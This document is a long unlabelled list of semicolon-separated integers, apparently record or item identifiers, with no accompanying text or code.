146392;153212;146471;146125;148202;146468;147777;147769;154180;144919;146844;146279;148174;148716;148793;147934;147773;145769;146297;146718;146412;146689;148801;147957;148732;147792;145558;148204;146373;147469;146896;148788;148715;148797;145238;144965;148198;146396;147745;147940;148157;148780;147739;147087;148743;148720;147782;145784;148722;145486;144920;146575;148728;146839;148783;146746;145142;147795;146917;145152;147734;145367;146841;148731;146284;146969;147933;144966;146277;148790;148727;148197;145483;146899;147859;145522;146364;145760;147450;147958;146554;145528;147787;148214;146913;148782;155960;145391;146856;145521;146393;146192;148718;147945;148792;148232;146901;146407;146902;147959;148085;146564;146509;148734;146835;146853;146399;145126;147186;147778;148777;146828;147175;145204;148726;146977;148741;148742;148776;149414;145240;146843;147027;146223;148917;146289;146260;153093;149989;147435;148730;154065;147854;148804;145107;147742;144964;148735;146400;148802;146323;147188;145716;148724;148163;148156;148796;147935;146184;147743;146244;145196;144838;146290;146368;145122;145315;146905;145780;144918;146572;152831;147026;145759;146737;146525;147770;148798;146558;145302;145254;147183;145131;146884;147768;148178;154140;146847;148799;147873;154857;147771;146559;147180;145747;145241;147429;146292;145178;148778;146234;148800;145337;148729;145482;148725;148785;146505;148238;148744;146280;148228;146894;144955;146462;145200;146276;146886;146970;148781;147153;146472;144958;147618;153200;147177;144816;147068;148205;147747;154184;146464;147484;147515;144961;146295;146943;148158;148208;147939;144954;145119;147554;148721;146467;148199;146830;146370;144916;148717;146855;147738;154839;145235;146606;146909;147519;146556;147943;146469;146557;146834;146947;146294;146502;147746;147802;147185;145190;148161;147791;146829;146691;145776;146054;147932;148805;148719;148789;148784;148154;146854;146356;147437;145197;147941;148794;145141;148779;146837;147498;144842;145281;148229;145751;148733;148253;145568;145150;146515;146354;148803;147181;148736;145388;146414;146522;146415;147156;148791;145529;148231;146049;145112;147798;144819;145722;147942;147847;146979;147576;148213;146319;145562;146850;146281;146900;148051;148087;148723;148786;145714;146529;146848;148230;146939;149990;146840;145763;147803;146286;147154;146358;146832;146275;148787;148795;146749;146137;145138;147740;146842;146500;145115;146519;147856;145318;144840;145260;146906;147151;146241;147815;158437;158443;158441;158557;156741;158257;157153;158442;157888;20952;62277;62278;62279;62280;62281;62282;133440;133441;22414;50651;22295;21610;159010;34969;31660;11586;24016;25039;69476;69494;21565;69475;17593;23831;45112;73640;21567;58233;11026;22964;17975;11153;14773;140575;57914;10068;10069;11193;10070;10071;10072;10534;17141;10073;10788;12036;30218;99132;12246;32315;22269;80103;99133;32316;80104;25492;144648;89724;77057;103673;77056;70295;32031;29252;27619;66519;65741;39621;47745;47746;10074;27576;56310;23925;15934;59328;77159;110774;123688;50450;50449;46201;16224;59318;20302;22056;52673;80998;81127;83365;106606;21079;23869;25694;29741;31799;34741;35742;40434;43068;46859;48300;49307;50493;44596;51926;53472;54299;54972;55140;55803;56259;56874;58001;58207;58538;58994;59426;61550;61622;62480;62836;63242;63450;64506;64584;64916;65219;65910;66445;66872;67225;69866;70858;71351;71951;72284;72606;72937;73433;73740;73994;74431;76413;77172;77577;78441;79140;79442;79835;80484;80946;81819;82781;84048;84365;84642;84730;85326;86060;86369;86423;86851;87244;87657;88639;89834;90425;91163;91670;92012;93461;93960;94334;94628;95762;96388;97142;97727;99283;100052;100756;101362;102262;103124;103922;104544;105175;105691;108281;108958;109601;110397;110979;111683;117410;118909;119462;119094;122117;123938;125056;125815;128633;133607;137253;141494;28211;11952;20158;11323;59196;59176;59175;60111;60110;11710;119778;19396;20293;16095;56992;18428;18429;41945;40824;110558;62392;89692;89693;62393;25371;27599;24712;58272;58273;133090;128148;90151;25442;38828;20929;149498;38156;121038;50525;58902;76578;76577;151288;151291;10075;10076;88840;84919;84920;73523;86470;100594;81383;81384;81382;56049;76535;122858;123009;131285;125405;137084;155788;76534;31347;93098;38155;129782;143482;150156;17367;85514;73524;81670;82996;86471;112183;124328;139546;73669;76493;79253;83812;73531;73522;97387;95439;95440;119751;73525;77988;88841;85910;85911;93128;97066;99969;124324;100384;52544;102132;104274;100998;104656;104657;103873;104352;104886;110415;106583;122855;110812;131283;117936;121356;124280;119421;128278;125885;128552;125886;125888;125887;125889;132317;127134;131185;139547;134228;130209;133358;131320;141122;143045;141567;141121;144948;156783;156754;147661;156752;152514;156755;156550;156569;73526;73527;158390;93196;73532;85737;89867;85738;85739;90314;85740;85741;85806;87896;73528;85742;73529;73530;77220;88842;74105;83031;21589;158687;11796;65669;65670;65059;65058;144448;148136;132633;139233;65614;125924;152220;154005;65613;157230;139315;141216;144566;147921;149359;152861;155706;158564;49808;125925;86697;119258;119835;102682;119836;90566;119259;119260;119261;119262;119263;101523;124412;127059;130625;102858;104742;119308;119837;119309;104436;121246;119838;109398;111376;121045;131077;118092;124413;131191;126750;133525;135848;140503;144647;141568;139316;49807;141217;144567;147920;149358;152161;154004;32396;45404;55422;48276;157229;49780;55671;52458;57050;62064;62384;72723;62063;86698;90567;101524;102859;112059;104433;109399;111377;121046;118093;131078;126751;125153;128422;129494;133526;135849;43029;64094;32395;39481;35807;133853;131941;131942;139412;139924;131316;132872;58645;92700;132586;11939;11370;10376;12053;33549;47557;21146;14588;14266;12527;12530;110559;15761;15500;110560;12555;12556;12566;12575;12581;20989;14440;12589;14345;140310;37723;122372;134356;107078;37111;109437;117910;88875;21646;64488;92338;53905;34939;86334;100974;133629;91332;117844;135880;40910;156075;21378;18814;110465;37996;18815;78878;86645;151497;44952;102687;86176;18816;18817;132665;43176;66968;55429;90876;83939;143517;18818;57402;33186;31081;84409;37293;158265;21379;74295;95585;18819;18820;91475;103555;74176;30029;144125;35998;72953;18821;18822;78495;153072;92674;96363;18823;18824;91203;84600;57907;72954;36136;86583;65540;142952;42874;67249;106879;70515;18825;137381;87980;57415;46244;69087;53579;99058;32487;92675;100140;153984;99206;47793;109877;18826;88665;100313;80923;18827;128491;127876;133969;55912;58609;99178;126592;70066;122959;37713;87981;31633;42808;18828;18829;78577;88570;124788;92676;117863;23950;146411;51404;109713;18830;111540;34445;36012;18831;86385;97807;33935;133243;31830;61586;117594;84651;129545;81062;88729;97197;23951;36645;150273;86386;91696;144147;34685;142665;111402;21380;18832;35405;111403;37252;25591;92831;139639;108923;93494;139109;72527;135729;149974;105335;101826;21381;145024;86584;139738;21382;133327;134963;112128;32488;134999;63015;90553;91908;148750;148503;21730;56077;76134;104226;45583;158143;69278;58828;21731;18833;21383;62488;139640;144165;73549;85366;138123;156224;92884;66734;44599;145027;57785;92885;22294;92339;35277;25129;149234;119056;92886;83328;157887;74479;21384;55281;21585;55913;92887;22486;94491;73661;101186;96364;94126;144184;100113;92888;18834;60114;66769;21385;84886;136533;92889;21386;58756;85426;71506;100881;37724;96365;18835;80069;92890;36588;57445;91697;91909;86805;92891;106424;134719;126019;18836;40460;92892;84482;59083;104835;127539;58358;37913;92893;51100;84693;90979;18837;84321;78815;92894;91145;50327;34164;156036;18838;50328;87290;92895;18839;134720;38114;35283;34688;146798;86177;91698;25827;153126;151004;25305;92896;56803;119510;86585;85519;138414;61443;84322;158451;128308;24719;81460;34256;18840;61587;101966;135881;18841;58937;94492;157244;106732;18842;36042;58313;35562;146499;63368;103474;18843;84694;106467;57857;21387;18844;150010;129573;21700;94663;88583;103556;137342;84104;87685;84068;104061;128584;79810;139471;87609;93983;125437;139529;121403;72247;122630;142311;87176;124374;41021;18845;54619;21388;51101;25437;87114;111404;149374;137382;66735;127945;26084;103759;95393;152657;18846;25472;31714;37848;24705;37320;89707;25748;34389;21389;65840;18847;63369;121604;76879;63364;24201;87686;125871;122936;35289;145257;66507;145560;148511;35613;118315;18848;147937;65935;104113;62105;59103;47025;99615;128492;153205;118900;18849;54620;51393;127540;52728;38779;26085;84695;84553;96850;34257;65936;87687;62884;40978;28316;34976;100610;103795;36791;153817;26212;123053;149247;21390;136990;63263;48749;100674;33239;134437;18850;132792;103522;61740;22451;104982;26977;88743;69213;58162;142275;149341;72312;125662;62068;110675;76301;60150;22208;121495;57550;88816;122165;63637;72717;95408;125614;37142;18851;59746;86876;22882;36579;86775;156027;50329;61725;58972;23758;18852;126534;144157;95450;22883;142940;47751;44333;37021;73900;137285;66635;18853;21391;138370;18854;126928;102688;119821;22515;22487;104487;126841;95499;51503;72893;57454;36167;91720;21678;44625;37781;36819;136384;91370;93942;106831;97219;30241;45547;131466;18855;157237;31953;57585;54838;63395;134438;23793;90605;56078;43161;96292;122987;18856;21392;63396;18857;67117;18858;63588;151809;146598;89764;22884;153870;126363;118844;104488;21393;57908;58837;81134;76195;64742;129084;132410;54621;133822;51962;63016;47142;127541;108703;158217;88666;18859;93933;91699;51102;65623;102465;18860;80148;143591;152901;152227;51132;106236;33904;21394;19337;138536;54982;59380;83080;21395;111018;18861;84132;86198;138658;38799;133432;33374;156078;106810;59361;133707;38135;25802;132064;104489;89006;18862;25803;144927;148207;21396;56804;36865;37369;112236;105063;18863;21788;35050;56323;140234;87480;109050;22428;148748;18864;90286;107126;70516;65989;37032;58646;61501;26086;62856;111176;27844;138245;150702;129114;36191;36605;18865;18867;18866;72872;83130;35284;87269;84380;131970;22209;59281;87291;21397;64873;78816;135941;149973;87688;106880;89765;96510;107042;140311;35240;21789;34270;21907;91790;133708;131844;119270;121521;21398;82062;102846;18868;112069;84410;18869;140725;21701;117966;85699;118182;18870;118496;18871;142946;79656;87292;55395;21399;108623;126593;18872;158033;35335;40583;84254;96163;99749;126315;18873;94238;106287;40899;34728;84381;81175;72955;140677;86586;34301;21400;22885;21401;136534;90606;38140;42238;47677;21402;153894;78634;84201;90980;35701;47616;135713;110628;106938;58640;82313;36365;137930;18874;119562;18875;36869;48250;18876;21403;94415;104162;97808;144658;129838;37618;28193;38697;48396;138124;83510;149424;18877;66918;106811;144182;21404;104537;122883;79955;37542;35051;35290;158169;94918;85593;83841;46259;97972;37058;136955;104731;106993;158782;63159;47818;18878;94416;92851;71874;21405;18879;86335;84860;36864;58359;85594;35052;119698;44345;90334;29769;18880;137789;104693;49108;142535;119879;18881;18882;62791;35241;137343;154139;105448;18883;51504;86620;81461;93984;156698;44600;96397;119511;121272;84483;117303;99551;108351;62770;59747;69052;96116;133328;57909;18884;69395;107109;87689;91026;18885;96992;51450;62956;61741;124286;35426;26087;132879;37495;21768;154925;103343;55812;18886;51567;87385;25664;84522;18887;93614;140626;85775;22871;103760;140472;86877;96411;106425;140678;58938;89007;28165;130238;95734;117649;86079;18888;22452;124219;111362;25833;21406;147688;88817;34504;37185;110403;21407;37467;19338;18889;21408;18890;94417;71529;58422;88149;91476;64374;56117;53439;21577;139739;81096;51928;141103;66798;21409;147558;110390;57968;82578;86834;76951;18891;69008;85595;42331;35469;60055;146477;150260;62022;104863;86835;43104;32061;37433;55821;50627;107110;33240;57852;68898;28348;112281;31154;55723;136535;36362;36476;21410;29689;101330;18892;97342;108314;145364;46876;91928;29770;55157;88027;42355;92340;88500;106733;37229;147814;18893;149073;146846;68917;29771;76922;28349;83792;61480;85965;91508;37593;18894;37125;18895;119563;117650;137344;137286;25632;18896;22488;53468;58438;109190;93442;57529;87885;87361;118073;154774;117441;45613;103584;37695;82890;18897;126484;22453;37115;138125;118476;57675;135882;36275;61762;22198;25015;19339;105064;18898;23738;54951;84628;48370;53906;85337;22499;102689;83554;157386;25260;153826;119315;99192;66549;112070;59302;145349;35935;51950;33547;22500;18899;36492;88667;21411;61451;53907;62814;18900;88465;81395;77638;88853;91027;118704;77596;125438;84696;91399;134843;150314;105214;73150;76584;109330;88067;50699;106597;125098;83793;51505;153222;34977;84697;35936;21412;38838;81009;136706;23985;84652;58864;85172;59439;130494;77733;37616;121199;111405;83794;56805;145274;34151;64089;144193;37929;51560;151899;136849;21413;127106;62832;139934;111363;85858;28259;56657;86431;122570;18901;18902;45529;25512;38963;108524;43342;37712;126136;127542;130239;37799;66581;147098;34496;144158;63401;110578;59945;49062;27550;81331;119426;88730;96058;25451;108680;96366;18903;36212;127946;18904;81193;21414;87610;87982;103475;45570;37480;67237;71485;105336;125439;18905;125440;105090;62054;158995;21415;18906;70865;100496;134721;43093;100282;85991;111561;96172;77315;126485;144028;139266;136158;53523;130240;59516;64791;57329;111019;92448;149425;36998;24730;18907;104227;26088;127543;83555;25425;106699;93443;134686;18908;84698;59063;84699;85859;96322;135795;23986;153073;71960;86044;86836;132349;85639;106036;103523;126519;23759;92770;85427;25834;21416;62792;18909;124608;146288;72528;92739;149483;127086;122412;99552;71603;18910;120968;36863;106037;131467;78015;146792;37227;152860;86889;53852;57646;39578;87293;142539;106734;35053;101539;76600;55956;65841;103953;102833;19340;23952;124429;18911;53881;87690;156021;18912;139714;57830;92006;21417;49273;134921;56490;80149;85640;87691;55430;18913;105665;83901;50330;35623;18914;87789;18915;21418;125687;21647;18916;100565;148697;137165;133970;117845;65067;18917;121427;63373;56576;64516;100141;71223;122657;38881;150316;151119;104163;121564;109051;130241;24202;127947;96117;97687;137869;103656;37846;145478;18918;131468;86276;110254;36231;96086;141465;58471;89047;85367;87692;72612;18919;92341;47904;21419;138126;76614;21420;136850;84861;42094;19341;103557;84411;22239;93674;158199;121629;94081;27578;18920;29950;156715;34762;85641;43376;36947;93144;118246;88603;93061;125346;32062;51963;71450;21421;84780;21422;35054;28350;22489;89048;81798;34786;136442;25981;138922;112071;101540;40868;141844;18921;130921;130242;18922;150312;110539;125749;95500;123980;52486;18923;85173;58641;21574;148506;64792;121522;104265;58201;63469;122884;21423;93985;156440;92027;102615;110953;126413;42129;34390;99059;103476;95418;70964;146166;85483;71451;153396;21424;103152;59313;50331;77883;90335;124220;83909;146578;66799;22909;21425;25840;109052;18924;38800;61557;105337;38801;95419;85924;21633;18925;95501;36300;58642;149361;59206;96323;90336;27508;130243;109383;63370;56491;131260;126137;153435;119481;83511;87294;40485;100283;18926;91791;136159;76543;18927;159035;66455;49166;25841;51964;38802;78002;105215;61780;83795;35582;29796;95502;50469;134585;53440;121335;56168;96511;18928;34723;38751;156026;105140;69250;87693;26037;156029;35427;126364;65967;62793;57786;62866;86621;119699;87611;96820;137126;51363;21426;95503;18929;51568;118074;59859;136003;61742;140312;87213;151009;92897;62885;140627;84970;99553;110429;25261;51103;55517;103477;90287;61588;35937;131469;136758;69412;96618;61639;130244;36910;34940;43377;63069;95504;36730;70261;158197;23794;84700;72382;57403;91371;110653;124046;71530;21427;70672;40486;131470;86188;18930;80424;136956;42428;66889;73266;153220;126486;87790;145316;88512;142855;118477;39315;119822;103741;61781;124560;33419;66630;45584;141793;101276;153982;97788;104759;52966;109749;84701;142856;130245;147680;103478;22240;88466;106598;21428;45561;83081;37117;94691;100441;130439;121324;95505;147900;36192;55845;149343;86178;95814;78016;87997;59517;32063;88668;18931;156052;40571;149079;18932;45614;100497;27067;38803;63256;109625;88068;23987;95506;18933;149857;122631;76060;104647;146907;85700;100646;103153;88669;18934;50700;33241;62194;53407;130246;56277;95507;144673;18935;152069;110540;87612;56685;61763;71070;153821;84554;120969;91929;86878;56492;87177;119246;78017;65184;65170;81332;95786;35089;18936;19342;84069;63049;124353;51991;95508;128979;59466;32449;102278;107243;103840;34497;64288;92740;88584;55158;61522;107043;85757;143178;18937;29849;73389;18938;88818;86806;127948;25049;79795;18939;148526;148869;43626;45114;95509;55877;149249;135603;70795;82786;127544;36807;83512;18940;55009;106994;100081;90844;62611;153815;111583;36654;35055;133709;21429;62489;24825;109228;153827;85257;136302;91267;32110;66250;58137;81462;96619;81116;19343;73321;51379;157239;60151;95510;31983;35336;35583;64743;150171;103524;149888;126842;18941;21430;134256;21431;18942;84412;18943;137166;88977;18944;150091;21432;59084;66845;73676;40691;127545;87744;95511;136596;89708;35695;84702;110579;79364;102939;22516;133476;18945;148200;117864;111655;56772;23663;99554;96938;108738;71808;51582;37439;74342;144172;71983;21433;109661;89895;63115;158787;109662;105065;109053;137790;126081;27813;145236;136160;23871;147874;85033;146833;36550;62340;18946;18947;69888;134922;90288;84813;70299;57628;108979;18948;25050;35401;93388;111406;96939;86277;87745;36673;55822;106832;18949;35770;19344;143543;45135;100284;88467;58889;121565;88684;19345;146601;90049;145567;68918;102530;99496;80350;158994;126365;158403;96324;62886;18950;18951;38882;97544;124209;32145;152226;122109;18952;43037;133244;87830;36893;22051;62705;97809;141517;149883;150196;21434;18953;65541;82650;122960;124221;133710;95546;24307;104836;58670;83796;99555;18954;73632;101217;35242;88468;61502;73633;87694;59009;29990;21435;127949;58360;58472;21436;92771;21437;29229;21438;73111;21439;117721;21440;37696;71285;21441;91372;37518;59282;88876;27640;143306;137870;18955;144868;18956;92342;35243;136940;144569;128585;71152;131148;82286;37225;135942;34978;66311;85428;96059;18957;145149;83842;87695;25426;88028;18958;92503;149512;39375;134335;62114;65185;77560;99698;87831;25130;26089;32299;81432;38964;18959;18960;120970;105449;21442;56476;138127;56493;42967;139683;52626;18961;96367;141284;18962;22501;83229;108429;53441;74114;59085;156210;19346;35624;93581;18963;89008;62806;157236;18964;38086;83940;22454;91437;61617;52058;22210;36251;153083;106115;59095;88944;66582;18965;34732;158989;23760;47143;42404;35337;137249;87295;156030;91839;146130;132428;18966;18967;73792;35938;21586;21443;156688;100581;58790;150015;144191;136851;137167;21444;48397;84814;140135;49123;32064;37471;22040;135730;87696;87983;21445;19347;37800;122084;129085;139830;99060;102690;86922;74181;69396;51069;57292;104797;42414;65199;48380;85608;77124;111771;69214;18968;42213;46245;149977;144177;44346;96221;150317;86686;35338;65842;136957;102330;123574;18969;105450;105502;37716;103237;38804;94418;25914;18970;92898;53442;107111;144190;145095;53469;21446;35563;18971;137791;138923;71257;130617;87746;87697;96512;121273;88604;61764;76196;65843;131295;144573;29288;18972;91373;89009;86266;89709;62731;18973;44407;92899;139472;87854;127546;134722;66814;35999;87225;111720;136687;117722;137792;77976;18974;153061;49728;57293;36564;87960;56762;86837;88469;72098;100775;21447;66736;56587;18975;58314;90233;106735;140628;89927;91581;108574;92900;140937;145023;23664;21563;90592;35584;21448;66631;92813;92901;87481;22052;103841;61743;91734;92902;25633;21449;18976;21450;101218;135425;124182;62490;127547;37841;18977;57818;102466;96851;40957;50332;92903;88670;29230;32065;90554;30127;103657;130413;106855;91553;88470;126138;118901;149231;42342;100393;29951;78521;92904;36518;139267;92537;73857;92651;37025;139435;95364;66312;151121;37131;132065;90050;92905;39594;86387;38021;153819;34484;40429;96639;25473;18978;72696;119851;89852;18979;93360;152745;36773;21451;70449;48332;46246;25634;18980;105338;122042;43094;138582;35625;51520;58829;139763;77836;86857;88471;141314;26038;97545;156028;120971;34327;92906;59026;147697;103842;66169;21452;58556;25016;92907;128135;122885;92741;69337;87362;35963;29874;21590;18981;92908;56477;82480;66837;92504;84523;105406;18982;153818;84703;85066;152746;87482;92909;51506;38705;100582;35279;82906;31031;92910;110691;40518;38002;128136;92911;38112;62341;34045;88472;24797;36333;18983;82514;71071;92912;27044;106856;36837;81587;92913;60101;70306;36576;21453;140235;34228;18984;37398;108352;133661;92914;89766;22517;43596;26090;50838;46214;37137;34188;18985;106649;36995;119700;154658;51666;105066;148703;34838;137690;104944;55970;34816;86587;140236;37183;37109;64987;151972;22139;81097;97403;94493;139436;50333;36618;88473;141293;93495;149071;158402;18986;103344;147897;50505;78611;143437;102010;18987;149514;105216;133971;82002;122359;102030;96742;36280;104760;111991;110969;134844;72995;153871;137691;23872;77717;89896;140237;47144;73550;42912;18988;21587;89853;74239;117651;103479;18989;18990;84704;66737;123481;85484;37096;136536;90845;88474;23988;56521;59220;92915;57551;35672;34446;118902;129661;18991;83797;24720;91637;71238;125278;108430;92916;69088;128042;104507;18992;66632;62957;92917;26091;156732;97107;102491;21454;86432;92918;84705;148518;50334;38657;65844;106736;92919;92772;18993;88475;128309;32066;80537;18994;100827;36237;92920;96471;79707;54622;18995;106881;97546;92921;21455;109663;140558;37076;92922;122988;132411;57338;24227;153823;92923;89010;65968;92924;79401;148599;61765;18996;97810;18997;118336;56079;151120;35280;92925;87984;117376;22341;57910;57739;25381;92926;96412;73487;99109;73793;92927;92832;89089;102101;34165;57647;153985;18998;93986;92928;21456;128586;91966;139268;102797;110430;91374;70262;88945;90846;102331;55502;124222;18999;73267;94082;53346;19000;89011;151778;53443;89727;19001;144187;149346;21457;58647;57629;56017;121404;86450;19002;135192;127548;21634;97108;56806;25679;37822;110274;93389;24365;64666;93033;95451;33187;22886;51832;100442;45446;91509;69065;19003;37951;25533;95787;40858;89012;66907;49686;85729;84706;38965;148211;57432;31155;36752;84707;72790;99646;19004;62958;126666;108624;19005;81683;44601;67103;78039;19348;72002;70701;89013;76719;95039;29289;129425;83024;97625;106237;47814;21458;86879;38966;91146;125934;64988;19006;86377;96368;84133;37206;19007;19008;144144;86838;37503;21459;19009;55878;35639;40461;19349;21460;84043;84708;109593;77125;83941;85368;19010;42310;61539;64885;77316;36636;105625;34979;87907;65845;56548;19011;86433;64874;81117;21461;37292;36421;152490;44049;37047;87661;123809;118754;25017;87698;87226;81618;19012;34018;86858;144174;21462;40659;93496;158983;42196;157319;101541;34686;19013;37039;104062;88671;158246;101187;63290;19014;136726;135714;132683;106939;96037;25804;84524;22502;91930;83798;21463;61481;47567;21464;37617;32146;45595;55914;40660;32067;87747;122085;21465;138537;34980;109594;65969;25784;131340;36168;101967;21466;87613;91910;127950;19015;42170;55846;139589;36472;152288;129839;47033;19350;25805;142156;153816;19016;34152;136385;74444;19017;145187;119316;102138;130922;144185;87614;19018;79365;32147;73881;156079;19019;109565;97688;88150;152747;72849;76985;84887;49652;21467;87699;119271;55439;29772;87188;128587;45447;77036;19020;111177;84862;133588;88476;19021;81867;35640;152205;21468;132793;66938;52666;148530;106812;151410;117911;21469;90289;147172;118124;100975;19022;90847;47794;84709;37686;35339;35928;19023;64421;57390;66210;51889;134336;70484;97312;48427;105362;88819;21470;63674;51915;38015;46005;143526;125379;31954;106214;21471;158985;94083;91931;154315;19024;135943;139831;95365;139347;95265;19025;19026;27845;61675;25359;78003;24838;37029;133894;121405;72768;146574;102553;82481;106215;36000;107044;123981;19027;150172;89928;145781;143466;85293;21472;88672;119057;109066;35285;85966;19028;21473;84105;49729;111178;97220;66012;70379;22211;25560;70646;76615;111596;51521;72494;99240;89014;76986;32489;56857;34951;94450;19029;84710;103796;19030;103441;87227;61782;39425;93730;21474;57552;19031;96369;136688;73151;26937;19032;21475;130440;37777;34206;40935;23665;102279;120972;86278;19033;108476;118858;106426;152073;42875;84971;99974;90741;65846;101876;28194;81659;100828;21476;126756;106959;19351;23989;57720;34839;22887;36976;85596;87296;22872;57045;19034;88501;153285;89974;119272;24366;95974;79956;151900;105067;58283;109929;83910;21477;21478;65847;19035;70965;58963;131261;123422;42886;142035;90234;63365;86279;110319;109626;86451;80351;93497;148522;33905;63371;99616;103345;88744;141535;19036;84934;141391;73431;21479;158633;91268;152818;84314;19037;146560;37028;19038;50470;111656;97592;22910;94692;137438;19039;36682;100285;129369;19040;73488;142573;74318;109054;21480;90568;154773;86080;76720;90290;63470;19041;21481;91554;19042;159065;50335;134923;146516;85860;102408;56494;19043;73779;62298;124223;111721;19044;25806;126139;21482;49730;81588;136941;19045;36517;82063;81463;47130;129954;54623;58210;19046;156025;88112;19352;134466;69372;139110;70595;85573;19047;55633;47752;76302;45571;87700;154045;148516;68943;73551;151500;112052;62207;153892;21483;110521;103761;21484;28166;130077;125791;97789;153949;94458;56522;85861;49189;19048;27551;105712;146673;32068;94451;91510;78496;21485;35626;131471;84496;80983;64989;125935;156470;142151;135193;45382;21486;31437;81962;86955;151346;34498;119482;133662;58315;84994;72676;84525;84972;22212;56723;127549;76854;66770;109532;19049;128746;112072;111541;93361;88877;95693;87542;147148;139348;148520;85369;19050;19051;55681;136537;151008;31183;100976;156469;105141;137287;51104;73152;19052;128795;149039;135883;37145;38061;21487;139394;83513;93428;86320;35340;58838;101542;45572;37223;26938;123982;85574;34271;81222;66456;88502;84323;22923;58347;34817;90848;84781;96993;83902;61503;19053;106882;59027;124609;27622;146985;36766;35939;124224;36193;95512;85992;139641;141147;141512;133329;104983;90235;63397;87701;36920;135944;96060;144815;19353;45585;137216;136852;38967;111179;65975;36391;45573;19054;79567;50701;94693;141148;85893;105626;84324;19055;19056;66815;144826;122605;84070;19057;90337;53397;84325;61640;126667;146763;60056;27610;45586;84526;94263;57455;36857;103585;19058;57294;96709;19059;19060;72206;64744;118024;70966;63463;156370;36922;133121;97689;21488;92343;88513;62959;150168;125936;19061;38058;80840;66170;31082;85520;66583;100339;87386;91932;79402;108858;19062;82681;26939;103480;91911;127550;28317;90474;86388;19063;38805;124183;35341;104945;117465;153074;141549;104063;84527;90236;90902;132942;152859;22911;81223;100977;19064;28195;73049;37486;19065;90607;84413;37933;124047;97109;103860;88151;62649;153062;19066;21489;61676;87908;148537;19067;149489;154044;19068;19069;89015;58520;22518;19070;56080;69860;21490;146857;23771;21491;22007;65848;59314;56495;106288;23744;122989;99750;21492;131262;88673;94751;87387;106813;130183;84815;129426;79403;85758;96472;56527;139111;19071;125099;92344;22924;154199;145563;83556;109055;138784;87483;93429;61677;63070;56081;151971;59168;106737;64922;94214;102987;50351;109019;136021;101331;94903;104490;125839;19072;58316;25785;117492;79957;19073;96370;103909;22938;93987;56399;19074;128310;73552;136635;35442;102467;19075;24798;145193;66919;107045;91582;94419;95409;37051;85258;37437;109191;85521;61504;58473;84438;35056;50336;106857;19076;132350;93988;31831;84382;37516;19077;19078;77109;36848;143175;88152;88820;91933;19079;125663;86588;70866;93267;104984;89767;52038;135731;60134;87297;138128;69437;19080;22519;37792;85245;94527;21493;87702;128588;93934;144126;58423;66185;21494;36402;59748;97904;35057;84711;107046;103762;84712;19081;21648;21495;25942;135945;151005;118247;24686;19082;93498;119109;103861;74004;147872;56400;141318;21496;19083;153824;22008;157234;87178;85522;37934;62706;156324;148519;93211;131263;52707;83281;66966;129546;22018;96513;84484;152207;25592;157323;39426;139590;32148;19354;121447;84995;31832;19084;87832;123539;22888;29340;90742;129547;101381;103481;156031;19085;53266;134723;36617;19086;19087;50500;52956;153814;120973;24007;22925;40661;130632;146607;100706;59169;135194;144148;45009;140938;58839;106700;31438;144133;69507;101332;19088;108477;108431;87703;72850;66999;63434;58920;25718;88113;46791;106427;40958;19355;152570;130992;36281;19089;104612;133433;96994;111478;61766;57926;64886;91304;138071;118705;91375;85993;87704;83095;19090;21497;85862;19091;21498;48401;103461;21499;92574;19092;144188;93582;87748;19093;86859;78071;134257;128403;118942;19094;65849;22889;153813;157238;84555;133972;26092;122571;70263;25786;21500;124129;48360;103620;126487;72313;144122;19095;19096;108681;93989;86179;105451;132066;105026;126414;87662;119794;147848;82579;32069;103797;19097;59207;21501;139642;99556;58521;23850;139715;35564;156565;53347;110699;118497;103999;21502;86554;22503;143510;65068;111407;59086;41007;56169;36768;71961;36259;82891;83282;58021;47699;108508;39579;85994;119701;19098;41047;117723;35058;58671;21503;93755;44429;88532;21504;57051;35342;140629;87513;87749;19099;83964;146845;87705;57144;125913;93552;33471;95513;19100;35354;148930;139395;87750;91477;140313;40508;100737;35696;19101;111657;141322;84044;87751;77884;19102;80538;36731;111090;51929;35343;144841;19103;60102;19104;39427;154316;36239;65850;148505;56763;134337;122572;117652;104491;86214;109229;52468;31109;21505;76987;19105;87298;90877;55915;39784;105259;64667;86589;43127;41948;53470;140473;84528;135604;104732;117511;19106;73553;19107;37254;110954;91840;111408;27814;19108;55396;38806;52698;59381;149267;21506;21591;106181;91491;46260;19109;95694;148534;108859;73442;81684;103718;86839;96061;72114;70517;22342;25051;26039;96118;138371;133589;102280;39428;111091;153822;45338;92345;79197;156403;88503;37377;86267;94127;62023;39867;96371;86180;50404;24886;122685;59853;21507;96119;127551;89808;74240;124789;37595;103346;48278;87299;107283;85995;21508;78114;130495;33906;19110;134467;129771;151624;83514;63366;25102;35458;152203;80238;19111;96120;19112;103954;90051;89768;39802;82892;85034;84182;37811;76177;86519;137439;36240;36941;33188;148147;69066;111722;50074;33938;36521;19113;21509;152126;117893;80352;19114;102940;35940;107127;128887;133434;23666;94346;102724;136853;106701;106858;51507;33857;19115;36459;57411;61589;84224;85338;138199;99325;96995;21510;83441;111180;128654;118961;53217;108315;141149;66508;19116;21511;96121;136070;150311;64652;119273;110304;72194;21512;36968;19117;101827;150230;58757;60115;84973;90780;110504;154659;33242;133435;42298;87270;34724;45574;51670;93781;22140;61678;90237;153812;43879;84653;154198;26940;102508;122043;117304;65003;128043;44922;50320;26093;91526;81619;128439;79734;111479;151002;35941;84782;146605;92929;131795;77885;68990;37124;136443;92505;63435;36428;137127;31376;156199;19118;80453;37213;38031;19119;44390;127951;133436;92575;95586;94494;148931;71935;93990;19120;92652;118075;36637;83082;90238;91841;84713;84601;152150;19121;37430;80924;144446;19122;52986;35641;19123;152071;77679;83942;152206;71072;23667;103666;157235;19356;19124;151010;70264;19125;139112;90239;51965;19126;136386;110700;140314;100829;101828;65542;146285;108781;60135;25787;55991;19127;38151;74019;84326;137793;128493;19128;34391;31377;110916;36683;66738;56773;84714;61679;19129;51930;136689;152125;93943;60089;61505;105503;65851;86590;137168;104348;92395;37015;99557;123644;142625;35714;29811;24770;36194;52575;144167;83943;36912;141191;153983;83752;56187;19130;84383;78663;81685;96222;112187;137889;82482;119636;148517;144823;56496;94904;151003;122658;150002;19131;21513;35037;72155;110970;156323;139218;76269;71166;37427;136444;54624;152857;62979;23851;21790;90052;25052;77241;21514;25807;78104;27588;152748;132943;84783;135000;77753;86305;152204;56497;19132;22455;134258;121087;21515;57489;85996;79320;121406;156474;64646;136303;144179;84715;82753;46792;99558;96821;85997;133630;19133;84327;35344;151377;19134;19135;21516;96473;80559;153820;125937;108625;19136;127952;51194;91934;91700;106995;63589;35295;136387;64887;84282;87165;38113;103862;40496;85863;106599;21517;91527;87543;144962;92346;89854;119274;34416;139886;123144;49109;85894;132351;104228;55682;66875;37677;84529;